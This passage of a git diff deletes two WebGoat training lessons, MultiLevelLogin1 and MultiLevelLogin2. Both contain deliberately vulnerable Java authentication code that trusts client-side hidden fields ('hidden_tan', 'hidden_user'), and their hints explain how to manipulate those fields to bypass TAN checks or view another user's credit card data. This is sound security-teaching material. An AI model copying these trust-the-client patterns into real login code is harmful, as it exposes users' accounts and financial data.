- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * - * - * For details, please see http://webgoat.github.io - * - * @author Reto Lippuner, Marcel Wirth - * @created April 7, 2008 - */ - -public class MultiLevelLogin1 extends SequentialLessonAdapter -{ - private final static String USER = "user"; - private final static String PASSWORD = "pass"; - private final static String HIDDEN_TAN = "hidden_tan"; - private final static String TAN = "tan"; - - private final static String LOGGEDIN = "loggedin"; - private final static String CORRECTTAN = "correctTan"; - private final static String LOGGEDINUSER = "loggedInUser"; - - /** - * Creates Staged WebContent - * - * @param s - */ - protected Element createContent(WebSession s) - { - return super.createStagedContent(s); - } - - /** - * See if the user has logged in correctly - * - * @param s - * @return true if loggedIn - */ - private boolean loggedIn(WebSession s) - { - try - { - return s.get(LOGGEDIN).equals("true"); - } catch (Exception e) - { - return false; - } - } - - /** - * See if the user had used a valid tan - * - * @param s - * @return true if correctTan - */ - private boolean correctTan(WebSession s) - { - try - { - return s.get(CORRECTTAN).equals("true"); - } catch (Exception e) - { - return false; - } - } - - /** - * Get the logged in user - * - * @param s - * @return the logged in user - */ - private String getLoggedInUser(WebSession s) - { - try - { - String user = (String) s.get(LOGGEDINUSER); - return user; - } catch (Exception e) - { - return ""; - } - } - - /** - * Creation of the main content - * - * @param s - * @return Element - */ - protected Element createMainContent(WebSession s) - { - ElementContainer ec = new ElementContainer(); - - try - { - style sty = new style(); - - sty - .addElement("#lesson_wrapper {height: 435px;width: " - + "500px;}#lesson_header {background-image: " - + "url(lessons/DBSQLInjection/images/lesson1_header.jpg);width:" - + " 490px;padding-right: 10px;padding-top: 60px;background-repeat: no-repeat;}.lesson_workspace " - + 
"{background-image: url(lessons/DBSQLInjection/images/lesson1_workspace.jpg);width: 489px;height: " - + "325px;padding-left: 10px;padding-top: 10px;background-repeat: no-repeat;} " - + ".lesson_text {height: 240px;width: 460px;padding-top: 5px;} " - + "#lesson_buttons_bottom {height: 20px;width: 460px;} " - + "#lesson_b_b_left {width: 300px;float: left;} " - + "#lesson_b_b_right input {width: 100px;float: right;} " - + ".lesson_title_box {height: 20px;width: 420px;padding-left: 30px;} " - + ".lesson_workspace { } " - + ".lesson_txt_10 {font-family: Arial, Helvetica, sans-serif;font-size: 10px;} " - + ".lesson_text_db {color: #0066FF} " - + "#lesson_login {background-image: url(lessons/DBSQLInjection/images/lesson1_loginWindow.jpg);height: " - + "124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top:" - + " 50px;text-align: center;} #lesson_login_txt {font-family: Arial, Helvetica, sans-serif;font-size: " - + "12px;text-align: center;} #lesson_search {background-image: " - + "url(lessons/DBSQLInjection/images/lesson1_SearchWindow.jpg);height: 124px;width: 311px;background-repeat: " - + "no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}"); - ec.addElement(sty); - - Div wrapperDiv = new Div(); - wrapperDiv.setID("lesson_wrapper"); - - Div headerDiv = new Div(); - headerDiv.setID("lesson_header"); - - Div workspaceDiv = new Div(); - workspaceDiv.setClass("lesson_workspace"); - - wrapperDiv.addElement(headerDiv); - wrapperDiv.addElement(workspaceDiv); - - ec.addElement(wrapperDiv); - - workspaceDiv.addElement(createWorkspaceContent(s)); - - } catch (Exception e) - { - s.setMessage("Error generating " + this.getClass().getName()); - e.printStackTrace(); - } - - return (ec); - } - - /** - * Creation of the content of the workspace - * - * @param s - * @return Element - */ - private Element createWorkspaceContent(WebSession s) - { - String user = ""; - user = s.getParser().getStringParameter(USER, 
""); - String password = ""; - password = s.getParser().getStringParameter(PASSWORD, ""); - String tan = ""; - tan = s.getParser().getStringParameter(TAN, ""); - String hiddenTan = s.getParser().getStringParameter(HIDDEN_TAN, ""); - - ElementContainer ec = new ElementContainer(); - - // verify that tan is correct and user is logged in - if (loggedIn(s) && correctTan(getLoggedInUser(s), tan, hiddenTan, s)) - { - s.add(CORRECTTAN, "true"); - } - // user is loggedIn but enters wrong tan - else if (loggedIn(s) && !correctTan(getLoggedInUser(s), tan, hiddenTan, s)) - { - s.add(LOGGEDIN, "false"); - } - - // verify the password - if (correctLogin(user, password, s)) - { - s.add(LOGGEDIN, "true"); - s.add(LOGGEDINUSER, user); - } - - // if restart link is clicked owe have to reset log in - if (!s.getParser().getStringParameter("Restart", "").equals("")) - { - s.add(LOGGEDIN, "false"); - s.add(CORRECTTAN, "false"); - resetTans(s); - } - // Logout Button is pressed - if (s.getParser().getRawParameter("logout", "").equals("true")) - { - s.add(LOGGEDIN, "false"); - s.add(CORRECTTAN, "false"); - - } - if (loggedIn(s) && correctTan(s)) - { - s.add(LOGGEDIN, "false"); - s.add(CORRECTTAN, "false"); - - createSuccessfulLoginContent(s, ec); - if (getLessonTracker(s).getStage() == 2) - { - if (hiddenTan.equals("1")) - { - makeSuccess(s); - } - } - else - { - getLessonTracker(s).setStage(2); - s.setMessage("Stage 1 completed."); - } - } - - else if (loggedIn(s)) - { - int tanNr = getTanPosition(getLoggedInUser(s), s); - if (tanNr == 0) - { - createNoTanLeftContent(ec); - - } - else - { - createAskForTanContent(s, ec, tanNr); - } - - } - else - { - String errorMessage = ""; - - if (!(user + password).equals("")) - { - errorMessage = "Login failed! Make sure " + "that user name and password is correct."; - } - else if (!tan.equals("")) - { - errorMessage = "Login failed. 
Tan is " + "incorrect."; - } - - createLogInContent(ec, errorMessage); - } - - return ec; - } - - /** - * Create content for logging in - * - * @param ec - */ - private void createLogInContent(ElementContainer ec, String errorMessage) - { - Div loginDiv = new Div(); - loginDiv.setID("lesson_login"); - - Table table = new Table(); - table.addAttribute("align='center'", 0); - TR tr1 = new TR(); - TD td1 = new TD(); - TD td2 = new TD(); - td1.addElement(new StringElement("Enter your name: ")); - td2.addElement(new Input(Input.TEXT, USER)); - tr1.addElement(td1); - tr1.addElement(td2); - - TR tr2 = new TR(); - TD td3 = new TD(); - TD td4 = new TD(); - td3.addElement(new StringElement("Enter your password: ")); - td4.addElement(new Input(Input.PASSWORD, PASSWORD)); - tr2.addElement(td3); - tr2.addElement(td4); - - TR tr3 = new TR(); - TD td5 = new TD(); - td5.setColSpan(2); - td5.setAlign("center"); - - td5.addElement(new Input(Input.SUBMIT, "Submit", "Submit")); - tr3.addElement(td5); - - table.addElement(tr1); - table.addElement(tr2); - table.addElement(tr3); - loginDiv.addElement(table); - ec.addElement(loginDiv); - - H2 errorTag = new H2(errorMessage); - errorTag.addAttribute("align", "center"); - errorTag.addAttribute("class", "info"); - ec.addElement(errorTag); - } - - /** - * Create content in which the tan is asked - * - * @param s - * @param ec - * @param tanNr - */ - private void createAskForTanContent(WebSession s, ElementContainer ec, int tanNr) - { - - Div loginDiv = new Div(); - loginDiv.setID("lesson_login"); - - Table table = new Table(); - table.addAttribute("align='center'", 0); - TR tr1 = new TR(); - TD td1 = new TD(); - TD td2 = new TD(); - td1.addElement(new StringElement("Enter TAN #" + tanNr + ": ")); - td2.addElement(new Input(Input.TEXT, TAN)); - tr1.addElement(td1); - tr1.addElement(td2); - - TR tr2 = new TR(); - TD td3 = new TD(); - td3.setColSpan(2); - td3.setAlign("center"); - - td3.addElement(new Input(Input.SUBMIT, "Submit", "Submit")); - 
tr2.addElement(td3); - - table.addElement(tr1); - table.addElement(tr2); - - ec.addElement(new Input(Input.HIDDEN, HIDDEN_TAN, tanNr)); - loginDiv.addElement(table); - ec.addElement(loginDiv); - ec.addElement(createLogoutLink()); - - } - - /** - * Create content if there is no tan left - * - * @param ec - */ - private void createNoTanLeftContent(ElementContainer ec) - { - - ec.addElement(new BR()); - ec.addElement(new BR()); - ec.addElement(new BR()); - ec.addElement(new BR()); - H1 h = new H1("
No tan is left! Please contact the admin.
"); - ec.addElement(h); - ec.addElement(createLogoutLink()); - } - - /** - * Create content after a successful login - * - * @param s - * @param ec - */ - private void createSuccessfulLoginContent(WebSession s, ElementContainer ec) - { - - updateTan(getLoggedInUser(s), s); - String userDataStyle = "margin-top:50px;"; - - Div userDataDiv = new Div(); - userDataDiv.setStyle(userDataStyle); - userDataDiv.addAttribute("align", "center"); - Table table = new Table(); - table.addAttribute("cellspacing", 10); - table.addAttribute("cellpadding", 5); - - table.addAttribute("align", "center"); - TR tr1 = new TR(); - TR tr2 = new TR(); - TR tr3 = new TR(); - TR tr4 = new TR(); - tr1.addElement(new TD("Firstname:")); - tr1.addElement(new TD(getLoggedInUser(s))); - - try - { - ResultSet results = getUser(getLoggedInUser(s), s); - results.first(); - - tr2.addElement(new TD("Lastname:")); - tr2.addElement(new TD(results.getString("last_name"))); - - tr3.addElement(new TD("Credit Card Type:")); - tr3.addElement(new TD(results.getString("cc_type"))); - - tr4.addElement(new TD("Credit Card Number:")); - tr4.addElement(new TD(results.getString("cc_number"))); - - } - - catch (Exception e) - { - e.printStackTrace(); - } - table.addElement(tr1); - table.addElement(tr2); - table.addElement(tr3); - table.addElement(tr4); - - userDataDiv.addElement(table); - ec.addElement(userDataDiv); - ec.addElement(createLogoutLink()); - } - - /** - * Create a link for logging out - * - * @return Element - */ - private Element createLogoutLink() - { - A logoutLink = new A(); - logoutLink.addAttribute("href", getLink() + "&logout=true"); - logoutLink.addElement("Logout"); - - String logoutStyle = "margin-right:50px; mrgin-top:30px"; - Div logoutDiv = new Div(); - logoutDiv.addAttribute("align", "right"); - logoutDiv.addElement(logoutLink); - logoutDiv.setStyle(logoutStyle); - - return logoutDiv; - } - - /** - * Update the tan. Every tan should be used only once. 
- * - * @param user - * @param s - */ - private void updateTan(String user, WebSession s) - { - int tanNr = getTanPosition(user, s); - - Connection connection = null; - - try - { - connection = DatabaseUtilities.getConnection(s); - String query = "UPDATE user_data_tan SET login_count = ? WHERE first_name = ?"; - PreparedStatement prepStatement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - prepStatement.setInt(1, tanNr); - prepStatement.setString(2, user); - prepStatement.execute(); - - } catch (Exception e) - { - e.printStackTrace(); - } finally - { - try - { - if (connection != null) - { - connection.close(); - } - } catch (Exception e) - { - e.printStackTrace(); - } - } - - } - - /** - * If lesson is reseted the tans should be resetted too - * - * @param s - */ - private void resetTans(WebSession s) - { - Connection connection = null; - try - { - connection = DatabaseUtilities.getConnection(s); - String query = "UPDATE user_data_tan SET login_count = 0 WHERE login_count > 0"; - PreparedStatement prepStatement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - prepStatement.execute(); - - } catch (Exception e) - { - e.printStackTrace(); - } finally - { - try - { - if (connection != null) - { - connection.close(); - } - } catch (Exception e) - { - e.printStackTrace(); - } - } - - } - - /** - * Get the count of the tan - * - * @param user - * @param s - * @return tanPosition - */ - private int getTanPosition(String user, WebSession s) - { - int tanNr = 0; - Connection connection = null; - try - { - connection = DatabaseUtilities.getConnection(s); - String query = "SELECT login_count FROM user_data_tan WHERE first_name = ?"; - PreparedStatement prepStatement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - prepStatement.setString(1, user); - ResultSet results = prepStatement.executeQuery(); - - if 
((results != null) && (results.first() == true)) - { - - tanNr = results.getInt(results.getRow()); - tanNr = tanNr + 1; - if (tanNr > 5) - { - tanNr = 0; - } - // make sure you don't get the first tan in stage 2 - if (getLessonTracker(s).getStage() == 2 && tanNr == 1) - { - ++tanNr; - } - } - } catch (Exception e) - { - e.printStackTrace(); - } finally - { - try - { - if (connection != null) - { - connection.close(); - } - } catch (Exception e) - { - e.printStackTrace(); - } - } - - return tanNr; - } - - /** - * Get a user by its name - * - * @param user - * @param s - * @return ResultSet containing the user - */ - private ResultSet getUser(String user, WebSession s) - { - Connection connection = null; - try - { - connection = DatabaseUtilities.getConnection(s); - String query = "SELECT * FROM user_data_tan WHERE first_name = ? "; - PreparedStatement prepStatement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - prepStatement.setString(1, user); - - ResultSet results = prepStatement.executeQuery(); - - return results; - - } catch (Exception e) - { - e.printStackTrace(); - } finally - { - try - { - if (connection != null) - { - connection.close(); - } - } catch (Exception e) - { - e.printStackTrace(); - } - } - return null; - - } - - /** - * See if the tan is correct - * - * @param user - * @param tan - * @param tanPosition - * @param s - * @return true if the tan is correct - */ - private boolean correctTan(String user, String tan, String tanPosition, WebSession s) - { - if (tan.equals("")) { return false; } - Connection connection = null; - try - { - connection = DatabaseUtilities.getConnection(s); - String query = "SELECT user_data_tan.userid FROM user_data_tan, tan WHERE user_data_tan.first_name = ? " - + "AND user_data_tan.userid = tan.userid AND tan.tanValue = ? 
AND tan.tanNr = ?"; - PreparedStatement prepStatement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - prepStatement.setString(1, user); - prepStatement.setString(2, tan); - prepStatement.setString(3, tanPosition); - - ResultSet results = prepStatement.executeQuery(); - - if ((results != null) && (results.first() == true)) { - - return true; - - } - - } catch (Exception e) - { - e.printStackTrace(); - } finally - { - try - { - if (connection != null) - { - connection.close(); - } - } catch (Exception e) - { - e.printStackTrace(); - } - } - return false; - } - - /** - * See if the password and corresponding user is valid - * - * @param userName - * @param password - * @param s - * @return true if the password was correct - */ - private boolean correctLogin(String userName, String password, WebSession s) - { - Connection connection = null; - try - { - connection = DatabaseUtilities.getConnection(s); - String query = "SELECT * FROM user_data_tan WHERE first_name = ? 
AND password = ?"; - PreparedStatement prepStatement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - prepStatement.setString(1, userName); - prepStatement.setString(2, password); - - ResultSet results = prepStatement.executeQuery(); - - if ((results != null) && (results.first() == true)) { - - return true; - - } - - } catch (Exception e) - { - e.printStackTrace(); - } finally - { - try - { - if (connection != null) - { - connection.close(); - } - } catch (Exception e) - { - e.printStackTrace(); - } - } - - return false; - - } - - /** - * Gets the category attribute of the RoleBasedAccessControl object - * - * @return The category value - */ - protected ElementContainer doStage1(WebSession s) - { - ElementContainer ec = new ElementContainer(); - ec.addElement(createMainContent(s)); - return ec; - - } - - /** - * After finishing succesful stage1 this function is called - */ - protected Element doStage2(WebSession s) - { - ElementContainer ec = new ElementContainer(); - ec.addElement(createMainContent(s)); - return ec; - } - - /** - * Get the category - * - * @return the category - */ - protected Category getDefaultCategory() - { - return Category.AUTHENTICATION; - } - - /** - * Gets the hints attribute of the RoleBasedAccessControl object - * - * @return The hints value - */ - public List getHints(WebSession s) - { - List hints = new ArrayList(); - - hints.add("Stage 1: Just do a regular login"); - hints.add("Stage 2: How does the server know which TAN has to be used?"); - hints.add("Stage 2: Maybe taking a look at the source code helps"); - hints.add("Stage 2: Watch out for hidden fields"); - hints.add("Stage 2: Manipulate the hidden field 'hidden_tan'"); - - return hints; - - } - - /** - * Get the instructions for the user - */ - public String getInstructions(WebSession s) - { - String instructions = ""; - if (getLessonTracker(s).getStage() == 1) - { - instructions = "STAGE 1:\t This stage is just to show how 
a classic multi login works. " - + "Your goal is to do a regular login as Jane with password tarzan. " - + "You have following TANs:
" + "Tan #1 = 15648
" + "Tan #2 = 92156
" - + "Tan #3 = 4879
" + "Tan #4 = 9458
" + "Tan #5 = 4879
"; - - } - else if (getLessonTracker(s).getStage() == 2) - { - instructions = "STAGE 2:\tNow you are a hacker who " + "already has stolen some information from Jane by " - + "a phishing mail. " + "You have the password which is tarzan and " - + "the Tan #1 which is 15648
" + "The problem is that the first tan is already " - + "used... try to break into the system anyway. "; - } - - return (instructions); - } - - private final static Integer DEFAULT_RANKING = new Integer(110); - - /** - * Get the ranking for the hirarchy of lessons - */ - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } - - /** - * Get the title of the Lesson - */ - public String getTitle() - { - return ("Multi Level Login 1"); - } - - public Element getCredits() - { - return super.getCustomCredits("Created by: Reto Lippuner, Marcel Wirth", new StringElement("")); - } -} diff --git a/src/main/java/org/owasp/webgoat/lessons/MultiLevelLogin2.java b/src/main/java/org/owasp/webgoat/lessons/MultiLevelLogin2.java deleted file mode 100644 index 38341b699..000000000 --- a/src/main/java/org/owasp/webgoat/lessons/MultiLevelLogin2.java +++ /dev/null 
@@ -1,815 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.sql.Connection;
-import java.sql.PreparedStatement;
-import java.sql.ResultSet;
-import java.util.ArrayList;
-import java.util.List;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.A;
-import org.apache.ecs.html.BR;
-import org.apache.ecs.html.Div;
-import org.apache.ecs.html.H1;
-import org.apache.ecs.html.H2;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.apache.ecs.xhtml.style;
-import org.owasp.webgoat.session.DatabaseUtilities;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- *
- *
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects. 
- * - * - * For details, please see http://webgoat.github.io - * - * @author Reto Lippuner, Marcel Wirth - * @created April 7, 2008 - */ - -public class MultiLevelLogin2 extends LessonAdapter -{ - private final static String USER = "user2"; - private final static String PASSWORD = "pass2"; - private final static String TAN = "tan2"; - private final static String HIDDEN_USER = "hidden_user"; - - private final static String LOGGEDIN = "loggedin2"; - private final static String CORRECTTAN = "correctTan2"; - private final static String CURRENTTAN = "currentTan2"; - private final static String CURRENTTANPOS = "currentTanPos2"; - - // needed to see if lesson was successfull - private final static String LOGGEDINUSER = "loggedInUser2"; - - // private String LoggedInUser = ""; - - /** - * See if the user is logged in - * - * @param s - * @return true if loggedIn - */ - private boolean loggedIn(WebSession s) - { - try - { - return s.get(LOGGEDIN).equals("true"); - } catch (Exception e) - { - return false; - } - } - - /** - * See if the user had used a valid tan - * - * @param s - * @return true if correctTan - */ - private boolean correctTan(WebSession s) - { - try - { - return s.get(CORRECTTAN).equals("true"); - } catch (Exception e) - { - return false; - } - } - - /** - * Get the currentTan - * - * @param s - * @return the logged in user - */ - private String getCurrentTan(WebSession s) - { - try - { - String currentTan = (String) s.get(CURRENTTAN); - return currentTan; - } catch (Exception e) - { - return ""; - } - } - - /** - * Get the currentTanPossition - * - * @param s - * @return the logged in user - */ - private Integer getCurrentTanPosition(WebSession s) - { - try - { - Integer tanPos = (Integer) s.get(CURRENTTANPOS); - return tanPos; - } catch (Exception e) - { - return 0; - } - } - - /** - * Get the logged in user - * - * @param s - * @return the logged in user - */ - private String getLoggedInUser(WebSession s) - { - try - { - String user = (String) 
s.get(LOGGEDINUSER); - return user; - } catch (Exception e) - { - return ""; - } - } - - /** - * Creates WebContent - * - * @param s - */ - protected Element createContent(WebSession s) - { - ElementContainer ec = new ElementContainer(); - - try - { - style sty = new style(); - - sty - .addElement("#lesson_wrapper {height: 435px;width: 500px;}#lesson_header {background-image: url(lessons/DBSQLInjection/images/lesson1_header.jpg);width: 490px;padding-right: 10px;padding-top: 60px;background-repeat: no-repeat;}.lesson_workspace {background-image: url(lessons/DBSQLInjection/images/lesson1_workspace.jpg);width: 489px;height: 325px;padding-left: 10px;padding-top: 10px;background-repeat: no-repeat;} .lesson_text {height: 240px;width: 460px;padding-top: 5px;} #lesson_buttons_bottom {height: 20px;width: 460px;} #lesson_b_b_left {width: 300px;float: left;} #lesson_b_b_right input {width: 100px;float: right;} .lesson_title_box {height: 20px;width: 420px;padding-left: 30px;} .lesson_workspace { } .lesson_txt_10 {font-family: Arial, Helvetica, sans-serif;font-size: 10px;} .lesson_text_db {color: #0066FF} #lesson_login {background-image: url(lessons/DBSQLInjection/images/lesson1_loginWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;} #lesson_login_txt {font-family: Arial, Helvetica, sans-serif;font-size: 12px;text-align: center;} #lesson_search {background-image: url(lessons/DBSQLInjection/images/lesson1_SearchWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}"); - ec.addElement(sty); - - Div wrapperDiv = new Div(); - wrapperDiv.setID("lesson_wrapper"); - - Div headerDiv = new Div(); - headerDiv.setID("lesson_header"); - - Div workspaceDiv = new Div(); - workspaceDiv.setClass("lesson_workspace"); - - wrapperDiv.addElement(headerDiv); - wrapperDiv.addElement(workspaceDiv); - - 
ec.addElement(wrapperDiv); - - workspaceDiv.addElement(createWorkspaceContent(s)); - - } catch (Exception e) - { - s.setMessage("Error generating " + this.getClass().getName()); - e.printStackTrace(); - } - - return (ec); - } - - /** - * Creation of the content of the workspace - * - * @param s - * @return Element - */ - private Element createWorkspaceContent(WebSession s) - { - String user = ""; - user = s.getParser().getStringParameter(USER, ""); - String password = ""; - password = s.getParser().getStringParameter(PASSWORD, ""); - String tan = ""; - tan = s.getParser().getStringParameter(TAN, ""); - String hiddenUser = ""; - hiddenUser = s.getParser().getStringParameter(HIDDEN_USER, ""); - // String hiddenTan = s.getParser().getStringParameter(HIDDEN_TAN, ""); - - ElementContainer ec = new ElementContainer(); - - // verify that tan is correct and user is logged in - if (loggedIn(s) && correctTan(tan, s)) - { - s.add(CORRECTTAN, "true"); - } - // user is loggedIn but enters wrong tan - else if (loggedIn(s) && !correctTan(tan, s)) - { - s.add(LOGGEDIN, "false"); - } - - if (correctLogin(user, password, s)) - { - s.add(LOGGEDIN, "true"); - s.add(LOGGEDINUSER, user); - s.add(CURRENTTANPOS, getTanPosition(user, s)); - // currentTanNr = getTanPosition(user, s); - // currentTan = getTan(user, currentTanNr, s); - s.add(CURRENTTAN, getTan(user, getCurrentTanPosition(s), s)); - - } - - // if restart button is clicked owe have to reset log in - if (!s.getParser().getStringParameter("Restart", "").equals("")) - { - resetTans(s); - } - // Logout Button is pressed - if (s.getParser().getRawParameter("logout", "").equals("true")) - { - - s.add(LOGGEDIN, "false"); - s.add(CORRECTTAN, "false"); - - } - if (loggedIn(s) && correctTan(s)) - { - s.add(LOGGEDIN, "false"); - s.add(CORRECTTAN, "false"); - - createSuccessfulLoginContent(s, ec, hiddenUser); - - } - else if (loggedIn(s)) - { - if (getCurrentTanPosition(s) > 5) - { - createNoTanLeftContent(ec); - } - else - { - 
createAskForTanContent(s, ec, getCurrentTanPosition(s), user); - } - } - else - { - String errorMessage = ""; - - if (!(user + password).equals("")) - { - errorMessage = "Login failed! Make sure " + "that user name and password is correct."; - } - else if (!tan.equals("")) - { - errorMessage = "Login failed. Tan is " + "incorrect."; - } - - createLogInContent(ec, errorMessage); - } - - return ec; - } - - /** - * Create content for logging in - * - * @param ec - */ - private void createLogInContent(ElementContainer ec, String errorMessage) - { - Div loginDiv = new Div(); - loginDiv.setID("lesson_login"); - - Table table = new Table(); - // table.setStyle(tableStyle); - table.addAttribute("align='center'", 0); - TR tr1 = new TR(); - TD td1 = new TD(); - TD td2 = new TD(); - td1.addElement(new StringElement("Enter your name: ")); - td2.addElement(new Input(Input.TEXT, USER)); - tr1.addElement(td1); - tr1.addElement(td2); - - TR tr2 = new TR(); - TD td3 = new TD(); - TD td4 = new TD(); - td3.addElement(new StringElement("Enter your password: ")); - td4.addElement(new Input(Input.PASSWORD, PASSWORD)); - tr2.addElement(td3); - tr2.addElement(td4); - - TR tr3 = new TR(); - TD td5 = new TD(); - td5.setColSpan(2); - td5.setAlign("center"); - - td5.addElement(new Input(Input.SUBMIT, "Submit", "Submit")); - tr3.addElement(td5); - - table.addElement(tr1); - table.addElement(tr2); - table.addElement(tr3); - loginDiv.addElement(table); - ec.addElement(loginDiv); - - H2 errorTag = new H2(errorMessage); - errorTag.addAttribute("align", "center"); - errorTag.addAttribute("class", "info"); - ec.addElement(errorTag); - } - - /** - * Create content in which the tan is asked - * - * @param s - * @param ec - * @param tanNr - */ - private void createAskForTanContent(WebSession s, ElementContainer ec, int tanNr, String user) - { - - Div loginDiv = new Div(); - loginDiv.setID("lesson_login"); - - Table table = new Table(); - table.addAttribute("align='center'", 0); - TR tr1 = new TR(); - 
TD td1 = new TD(); - TD td2 = new TD(); - td1.addElement(new StringElement("Enter TAN #" + tanNr + ": ")); - td2.addElement(new Input(Input.TEXT, TAN)); - tr1.addElement(td1); - tr1.addElement(td2); - - TR tr2 = new TR(); - TD td3 = new TD(); - td3.setColSpan(2); - td3.setAlign("center"); - - td3.addElement(new Input(Input.SUBMIT, "Submit", "Submit")); - tr2.addElement(td3); - - table.addElement(tr1); - table.addElement(tr2); - - ec.addElement(new Input(Input.HIDDEN, HIDDEN_USER, user)); - loginDiv.addElement(table); - ec.addElement(loginDiv); - ec.addElement(createLogoutLink()); - - } - - /** - * Create content if there is no tan left - * - * @param ec - */ - private void createNoTanLeftContent(ElementContainer ec) - { - ec.addElement(new BR()); - ec.addElement(new BR()); - ec.addElement(new BR()); - ec.addElement(new BR()); - H1 h = new H1("
No tan is left! Please contact the admin.
"); - ec.addElement(h); - ec.addElement(createLogoutLink()); - } - - private void createSuccessfulLoginContent(WebSession s, ElementContainer ec, String user) - { - updateTan(user, s); - String userDataStyle = "margin-top:50px;"; - - Div userDataDiv = new Div(); - userDataDiv.setStyle(userDataStyle); - userDataDiv.addAttribute("align", "center"); - Table table = new Table(); - table.addAttribute("cellspacing", 10); - table.addAttribute("cellpadding", 5); - - table.addAttribute("align", "center"); - TR tr1 = new TR(); - TR tr2 = new TR(); - TR tr3 = new TR(); - TR tr4 = new TR(); - tr1.addElement(new TD("Firstname:")); - tr1.addElement(new TD(user)); - - try - { - ResultSet results = getUser(user, s); - if (results != null) - { - results.first(); - - tr2.addElement(new TD("Lastname:")); - tr2.addElement(new TD(results.getString("last_name"))); - - tr3.addElement(new TD("Credit Card Type:")); - tr3.addElement(new TD(results.getString("cc_type"))); - - tr4.addElement(new TD("Credit Card Number:")); - tr4.addElement(new TD(results.getString("cc_number"))); - - if (!user.equals(getLoggedInUser(s))) - { - makeSuccess(s); - } - } - - } - - catch (Exception e) - { - e.printStackTrace(); - } - table.addElement(tr1); - table.addElement(tr2); - table.addElement(tr3); - table.addElement(tr4); - - userDataDiv.addElement(table); - ec.addElement(userDataDiv); - ec.addElement(createLogoutLink()); - } - - /** - * Create a link for logging out - * - * @return Element - */ - private Element createLogoutLink() - { - A logoutLink = new A(); - logoutLink.addAttribute("href", getLink() + "&logout=true"); - logoutLink.addElement("Logout"); - - String logoutStyle = "margin-right:50px; mrgin-top:30px"; - Div logoutDiv = new Div(); - logoutDiv.addAttribute("align", "right"); - logoutDiv.addElement(logoutLink); - logoutDiv.setStyle(logoutStyle); - - return logoutDiv; - } - - /** - * Update the tan. Every tan should be used only once. 
- * - * @param user - * @param s - */ - private void updateTan(String user, WebSession s) - { - int tanNr = getTanPosition(user, s); - Connection connection = null; - try - { - connection = DatabaseUtilities.getConnection(s); - String query = "UPDATE user_data_tan SET login_count = ? WHERE first_name = ?"; - PreparedStatement prepStatement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - prepStatement.setInt(1, tanNr); - prepStatement.setString(2, user); - prepStatement.execute(); - - } catch (Exception e) - { - e.printStackTrace(); - } finally - { - try - { - if (connection != null) - { - connection.close(); - } - } catch (Exception e) - { - e.printStackTrace(); - } - } - - } - - /** - * Get a user by its name - * - * @param user - * @param s - * @return ResultSet containing the user - */ - private ResultSet getUser(String user, WebSession s) - { - Connection connection = null; - try - { - connection = DatabaseUtilities.getConnection(s); - String query = "SELECT * FROM user_data_tan WHERE first_name = ? 
"; - PreparedStatement prepStatement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - prepStatement.setString(1, user); - - ResultSet results = prepStatement.executeQuery(); - - return results; - - } catch (Exception e) - { - e.printStackTrace(); - } finally - { - try - { - if (connection != null) - { - connection.close(); - } - } catch (Exception e) - { - e.printStackTrace(); - } - } - return null; - - } - - /** - * If lesson is reseted the tans should be resetted too - * - * @param s - */ - private void resetTans(WebSession s) - { - Connection connection = null; - try - { - connection = DatabaseUtilities.getConnection(s); - String query = "UPDATE user_data_tan SET login_count = 0 WHERE login_count > 0"; - PreparedStatement prepStatement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - prepStatement.execute(); - - } catch (Exception e) - { - e.printStackTrace(); - } finally - { - try - { - if (connection != null) - { - connection.close(); - } - } catch (Exception e) - { - e.printStackTrace(); - } - } - - } - - /** - * Get the count of the tan - * - * @param user - * @param s - * @return tanPosition - */ - private int getTanPosition(String user, WebSession s) - { - int tanNr = 0; - Connection connection = null; - try - { - connection = DatabaseUtilities.getConnection(s); - String query = "SELECT login_count FROM user_data_tan WHERE first_name 